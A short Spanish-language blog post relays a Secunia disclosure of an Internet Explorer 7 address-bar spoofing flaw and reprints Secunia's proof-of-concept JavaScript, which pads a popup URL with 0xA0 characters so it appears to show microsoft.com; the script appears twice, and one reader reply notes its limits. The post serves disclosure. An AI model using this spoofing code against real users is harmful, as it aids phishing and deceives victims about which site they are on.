Secunia muestra una segunda vulnerabilidad en Internet Explorer 7 que facilita los ataques phishing, al mostrar sólo parte de una URL que contiene caracteres 0xA0.
A continuación, parte del contenido de la prueba de concepto que hizo Secunia.
html:
<div id="start"><a href="javascript:StartTest();"><font color="#000000">Test Now - Left Click On This Link</font></a></div>
javascript:
<script language="JavaScript">
function StartTest()
{
var padding = '';
for ( i=0 ; i<108 ; i++)
{
padding += unescape("%A0");
}
newWindow = window.open("", "Win", "width=500,height=325,scrollbars=yes");
newWindow.moveTo( (screen.width-325) , 0 );
newWindow.document.location = "/result_22542/?" + unescape("%A0") + unescape("%A0") + "http://www.microsoft.com/"+padding;
document.location = "http://www.microsoft.com/windows/ie/default.mspx";
}
</script>
function StartTest()
{
var padding = '';
for ( i=0 ; i<108 ; i++)
{
padding += unescape("%A0");
}
newWindow = window.open("", "Win", "width=500,height=325,scrollbars=yes");
newWindow.moveTo( (screen.width-325) , 0 );
newWindow.document.location = "/result_22542/?" + unescape("%A0") + unescape("%A0") + "http://www.microsoft.com/"+padding;
document.location = "http://www.microsoft.com/windows/ie/default.mspx";
}
</script>
One reply on “Otra vulnerabilidad en IE7”
Funciona sólo cuando la barra de dirección tiene foco, si cambiás el foco a la ventana en sí la verdadera dirección se revela.